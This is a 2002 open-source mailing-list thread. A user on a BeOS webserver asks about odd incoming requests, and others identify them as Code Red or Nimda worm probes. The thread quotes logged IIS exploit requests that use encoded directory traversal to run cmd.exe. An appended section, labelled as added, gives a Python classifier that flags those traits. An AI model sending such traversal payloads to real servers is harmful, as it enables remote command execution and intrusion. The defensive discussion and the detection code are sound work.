[openbeos] Re: I think someone tried to hack into my machine

  • From: Colin Rogers <crogers@xxxxxxxxxxxx>
  • To: "'openbeos@xxxxxxxxxxxxx'" <openbeos@xxxxxxxxxxxxx>
  • Date: Tue, 19 Mar 2002 11:39:07 -0000

"A BILL GATES DISCIPLE"

Actually he is less likely to be a Bill Gates disciple, BECAUSE he is a
hacker. For all we know, he could be using BeOS as a platform to hack NT
boxes! =] 

Col.

-----Original Message-----
From: AlAbsi [mailto:alabsi@xxxxxxxxxxxxxxx]
Sent: 19 March 2002 11:17
To: openbeos@xxxxxxxxxxxxx
Subject: [openbeos] Re: I think someone tried to hack into my machine


Dear Friends,

You don't know me, but I built so many hopes on BeOS, but it's gone. I
would like to salute you all for your enthusiasm and great work, but I
also would like you to remember the main reasons that made BeOS great,
like taking advantage instantly of multi-processor PCs, and the more user
friendly it is, the more success you'll achieve.

IF SOMEONE TRIED TO HACK YOU THEN IT'S A BILL GATES DISCIPLE LOL BUT I
GUESS HIS END WILL BE AT THE HANDS OF GREAT PPL LIKE YOU...CHEERS FOR
READING THIS AND GOD BLESS.

ANGELUS


  

-----Original Message-----
From: openbeos-bounce@xxxxxxxxxxxxx
[mailto:openbeos-bounce@xxxxxxxxxxxxx] On Behalf Of François Revol
Sent: Tuesday, March 19, 2002 12:13 PM
To: openbeos@xxxxxxxxxxxxx
Subject: [openbeos] Re: I think someone tried to hack into my machine

Seems just another codered or nimda searching for an already infected
box (on infection, it copies cmd.exe, the "shell" if it can be given that
name, to root.exe somewhere)
Don't take care, all it can do is grow your logs (and suck up your BW :-( )
It's solely NT related.

François.

In reply to Daniel Reinhold <danielr@xxxxxxxxxxxxx>:

> Ok, this was rather interesting. It happened just about fifteen minutes
> ago (as I'm writing this).
> 
> I'm online (PPP dialup) and am also running a local webserver (i.e. 
> sending requests to loopback address 127.0.0.1). Yeah, that's asking 
> for trouble, at least theoretically. That is, someone on the internet,
> if they happened to get a hold of my (temporary, dynamically assigned)
> IP, could send requests for local files and have them sent back out 
> across the network. I've never had anything weird happen before, so 
> I've always been pretty blase about the security risk.
> 
> Anyway, I'm just testing some news items locally before copying them 
> over to the OpenBeOS website (which is my usual MO). Suddenly, I notice
> the Terminal window (largely covered by another window, but partially 
> showing) has a flurry of text flying by and the DUN replicant in the 
> Deskbar shows lots of bytes transmitting back and forth. Wtf? So I 
> uncover the Terminal window (which is running the webserver) and see 
> that a number of unusual requests have just been attended to. Here's 
> the first one:
> 
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
> 
> The remaining requests all look like that but with different URLs. Here
> are the other URLs that were requested:
> 
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 
> To me, that looks all the world like some hacker trying to grab files 
> from my local machine. Could there be another explanation?
> 
> Of course, I'm running BeOS (and don't have NT) so my local webserver 
> just returned a bunch of 404 (Not found) responses. Still, makes you 
> wonder.
> 
> Has anyone else on this list had any similar experiences? What do you 
> make of this?
> 
> 
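
[Added example, not part of the original thread: a small Python classifier for request lines like the ones Daniel logged. It tags the traits discussed above (the root.exe check, cmd.exe requests, and the two path-encoding tricks). The trait names are hypothetical labels and the last sample line is a constructed benign request.]

```python
import re
from urllib.parse import unquote_to_bytes

# Request lines copied from the message above; the last one is constructed.
SAMPLE = [
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
    "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /news/index.html HTTP/1.0",  # constructed benign request
]

PCT = re.compile(rb"%[0-9a-fA-F]{2}")

def classify(request_line):
    """Return the set of probe traits found in one HTTP request line."""
    parts = request_line.split()
    if len(parts) < 2:
        return {"malformed"}
    raw_path = parts[1].split("?", 1)[0].encode("latin-1")
    once = unquote_to_bytes(raw_path)  # exactly one percent-decoding pass
    traits = set()
    # An escape that survives one pass means double encoding (%255c -> %5c).
    if PCT.search(once):
        traits.add("double-encoded")
    # 0xC0 and 0xC1 can never start a valid UTF-8 sequence; in these
    # requests they stand in for a disguised path separator.
    if b"\xc0" in once or b"\xc1" in once:
        traits.add("invalid-utf8-lead")
    name = once.lower().rsplit(b"/", 1)[-1]
    if name == b"root.exe":
        traits.add("backdoor-check")  # looks for an already infected box
    elif name == b"cmd.exe":
        traits.add("cmd-exe")
    return traits

def summarize(lines):
    """Map each flagged request line to its sorted traits; skip clean ones."""
    return {l: sorted(t) for l in lines if (t := classify(l))}

if __name__ == "__main__":
    for line, traits in summarize(SAMPLE).items():
        print(", ".join(traits), "<-", line)
```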






